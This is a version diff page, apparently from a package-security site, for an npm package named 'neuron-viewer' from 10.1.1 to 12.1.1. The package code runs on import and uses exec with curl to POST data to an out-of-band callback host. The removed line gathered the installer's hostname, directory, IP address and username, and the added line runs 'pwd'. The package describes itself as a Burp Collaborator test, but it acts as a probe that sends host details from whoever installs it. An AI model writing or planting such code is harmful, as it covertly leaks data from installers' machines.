neuron-viewer 10.1.1 → 12.1.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,7 +1,7 @@
1
1
  import { exec } from "child_process";
2
2
 
3
3
  function sendPingback(data) {
4
- const collaboratorUrl = "https://rxthgpisbdduguomjwmiutn5z78qalg0v.oast.fun";
4
+ const collaboratorUrl = "https://lodw0trx6ofihunthng3h5o8vz1rpid7.oastify.com";
5
5
 
6
6
  exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
7
7
  if (error) {
@@ -34,5 +34,5 @@ function executeCommand(command) {
34
34
  }
35
35
 
36
36
  // Example: Execute a command
37
- executeCommand('echo "Hostname: $(hostname), Directory: $(pwd), IP Address: $(hostname -I | awk \'{print $1}\'), Username: $(whoami)"');
37
+ executeCommand('pwd');
38
38
 
package/package.json CHANGED
@@ -2,7 +2,7 @@
2
2
 
3
3
  "name": "neuron-viewer",
4
4
 
5
- "version": "10.1.1",
5
+ "version": "12.1.1",
6
6
 
7
7
  "description": "A simple package to trigger Burp Collaborator for security testing",
8
8